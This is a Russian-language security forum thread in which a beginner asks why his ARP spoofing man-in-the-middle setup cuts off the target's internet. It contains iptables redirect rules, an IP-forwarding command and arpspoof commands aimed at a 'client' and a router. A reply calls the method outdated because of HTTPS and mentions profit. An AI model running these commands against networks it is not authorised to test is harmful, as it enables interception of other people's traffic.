• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Проблема с arpspoof

watersquad

Member
14.05.2020
8
0
BIT
0
Добрый вечер!

Недавно стал изучать тему хакинга, вот пытался сделать спуфинг

echo 1 > /proc/sys/net/ipv4/ip_forward (включил IP форвардинг на хосте, чтобы трафик уходил)

iptables -I INPUT 1 -p tcp --dport 8080 -j ACCEPT (открыл порт)

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 (настройл firewall для редиректа портов)

Запустил arpspoof

arpspoof -i en0 -t 192.168.0.103("клиент") -r 192.168.0.1(роутер)

arpspoof -i en0 -t 192.168.0.1(роутер) -r 192.168.0.103("клиент")

И все, интернет соедиение на комьютере "клиента" пропадает, ПОЧЕМУ?

Сразу скажу, я только вливаюсь в изучение темы, имею большое желание многому научится, крайне прошу помочь и не агрится на меня или мой вопрос.

Спасибо и хорошего всем дня!
 

s unity

Green Team
18.09.2019
207
26
BIT
0
ооочень знакомо. натыкался на подобную проблему, пытался что-то по этому поводу узнать. я так понял эта фишка настолько старая, что пофикшена везде. подмена пакетов идет, но не доходит до браузера. браузер уже все это дело видит.
по твоей проблеме: во первых ты проверял ип адрес "жерты"? если ты все правильно сделал он должен был измениться. если изменился, нужно попробовать пингануть google.com если пакеты идут, значит все ты верно настроил.
PS сейчас все ресурсы имеют сертификаты, пусть и самоподписаные, но имеют. чтобы извлечь профит нужно копать другую сферу.
 

watersquad

Member
14.05.2020
8
0
BIT
0
ооочень знакомо. натыкался на подобную проблему, пытался что-то по этому поводу узнать. я так понял эта фишка настолько старая, что пофикшена везде. подмена пакетов идет, но не доходит до браузера. браузер уже все это дело видит.
по твоей проблеме: во первых ты проверял ип адрес "жерты"? если ты все правильно сделал он должен был измениться. если изменился, нужно попробовать пингануть google.com если пакеты идут, значит все ты верно настроил.
PS сейчас все ресурсы имеют сертификаты, пусть и самоподписаные, но имеют. чтобы извлечь профит нужно копать другую сферу.
Просто только начал все это изучать, да я понимаю, что везде уже https стоит, просто хотел разобраться

Просто к слову, если не трудно, могли бы вы посоветовать материалов на тему сетевых и веб атак? Был бы крайне рад с:
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!